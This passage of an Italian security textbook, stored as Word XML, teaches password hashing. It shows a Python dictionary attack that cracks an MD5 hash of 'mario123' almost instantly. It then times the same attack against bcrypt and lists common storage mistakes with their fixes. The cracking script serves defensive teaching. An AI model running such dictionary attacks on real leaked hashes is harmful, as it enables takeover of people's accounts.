        <w:t xml:space="preserve">"ginger"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"princess"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"joshua"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"cheese"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"amanda"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"summer"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"love"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ashley"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"6969"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"nicole"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"chelsea"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"biteme"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"matthew"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"access"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"yankees"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"987654321"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"dallas"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"austin"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"thunder"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"taylor"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"matrix"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Aggiungiamo "mario123" (la nostra password)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Mario123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tentativo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> wordlist:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    hash_test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashlib.md5(tentativo.encode()).hexdigest()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash_test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash_target:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"✅ Password trovata: '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tentativo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Password non in wordlist"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esegui:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python crack-md5.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash target: 8a7d8de0d72712f57acdd77b3e898ee2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ Password trovata: 'mario123'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">0,001 secondi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hai cracckato la password. Se la wordlist fosse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rockyou.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(14 milioni di password reali, scaricabile da internet), copriresti probabilmente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">il 90% delle password reali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in pochi minuti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso ripeti l’esperimento con bcrypt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Hash bcrypt della stessa password</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash_target </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt.hashpw(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"mario123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, bcrypt.gensalt(rounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">wordlist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"123456"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"12345678"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"qwerty"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ... (lista completa)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">inizio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> time.time()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tentativo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> wordlist:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt.checkpw(tentativo.encode(), hash_target):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"✅ Password trovata: '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tentativo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f"Tempo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">time() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> inizio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:.2f}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> secondi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">break</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ Password trovata: 'mario123'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Tempo: 1.25 secondi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Già con 5 password, ci vuole più di 1 secondo. Con 14 milioni di password,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ci vorrebbero anni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se a questo aggiungi che ogni utente ha un salt diverso, il tempo si moltiplica per il numero di utenti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hai vissuto sulla pelle perché bcrypt cambia tutto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="340"/>
    <w:bookmarkEnd w:id="341"/>
    <w:bookmarkStart w:id="342" w:name="errori-comuni-in-produzione-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="536" w:name="sec_7_11"/>
      <w:r>
        <w:t xml:space="preserve">7.11 Errori comuni in produzione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="536"/>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t xml:space="preserve">Password salvate in chiaro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Disastro totale a ogni breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bcrypt o Argon2id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MD5 / SHA-1 / SHA-256 per password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cracckate in minuti dopo un breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bcrypt cost 12+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Salt mancante o riutilizzato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rainbow table funzionano</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Salt unico per ogni password (bcrypt lo fa automaticamente)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Salt corto o non casuale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Riduzione drastica della sicurezza</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Almeno 16 byte da CSPRNG (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
